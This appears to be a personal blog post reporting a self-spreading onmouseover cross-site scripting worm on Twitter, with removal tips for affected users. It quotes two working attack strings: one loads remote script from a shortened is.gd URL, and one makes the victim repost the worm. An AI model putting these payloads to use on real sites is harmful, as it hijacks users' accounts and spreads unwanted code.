VIRUS/Glitch in Twitter’s new location feature?

General_Header_620x164

My twitter just looked like this:

Someone used a glitch in the new location feature I guess. Look at this code in their advertising for the feature:


Tweet
New! Add a location to your tweets. Turn it on - No thanks
Latest: http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/ 3 minutes ago

You see it in my screenshot. So basically me doing nothing transformed my whole Twitter into what you see in the screenshot, the error was reloading itself as if Twitter was trying to post over and over again. It appears I posted that code too, everyone who sees it gets affected.

After I clicked Home, every link on my page was leading to t.co instead of Twitter, feels and looks like a virus. It is spreading through Twitter!! My whole timeline is complaining, so please stay away from twitter or use an app which might be save!

[EDIT]

Tweetdeck seems to be save. If you are affected by that worm, you can delete your own tweet(s) spreading the worm: You can view your own profile in Tweetdeck by clicking your picture, Other Actions, User, View Profile. Then next to your “virus” tweet, Other Actions, Tweet, Delete.

The offender looks like this, if YOU tweeted this, delete it please:

http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/

[EDIT 2]
First afterthought: Wow, it seems like such a beginner’s error, to allow user generated content to inject code into Twitter.com . Twitter is a massive thing now, couldn’t anyone foresee this?

2nd afterthought: Twitter has double-post protection. If the hackers were a little bit more clever, they would have made the virus change its form like HIV, and then I would have spammed out 10 or 20 of those links in a state of surprise. *swallows* I hope Twitter hires more security guys now.

Advertisements

One thought on “VIRUS/Glitch in Twitter’s new location feature?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s